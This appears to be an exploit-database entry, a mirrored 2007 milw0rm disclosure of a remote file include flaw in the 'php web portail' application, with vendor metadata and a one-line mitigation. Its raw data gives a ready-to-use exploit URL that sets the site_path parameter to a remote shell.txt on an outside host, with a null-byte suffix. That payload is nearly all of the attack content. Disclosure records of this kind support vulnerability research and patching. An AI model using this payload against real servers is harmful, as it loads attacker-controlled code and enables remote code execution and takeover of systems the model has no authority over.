header-logo
Suggest Exploit
vendor:
php web portail
by:
Laurent Gaffié
N/A
CVSS
HIGH
remote file include
98
CWE
Product Name: php web portail
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

php web portail [remote file include]

The vulnerability allows remote attackers to include arbitrary files from external sources, potentially leading to remote code execution.

Mitigation:

To mitigate this vulnerability, ensure that user input is properly validated and sanitized before including files.
Source

Exploit-DB raw data:

php web portail [remote file include]
download site: https://sourceforge.net/project/showfiles.php?group_id=178400
product:php web portail
bug: remote file include
risk : high

remote file include :

/includes/includes.php?site_path=http://site.com/shell.txt?%00



laurent gaffié
http://s-a-p.ca/
contact: saps.audit@gmail.com

# milw0rm.com [2007-02-01]

Navigation

Suggest Exploit

Services By CQR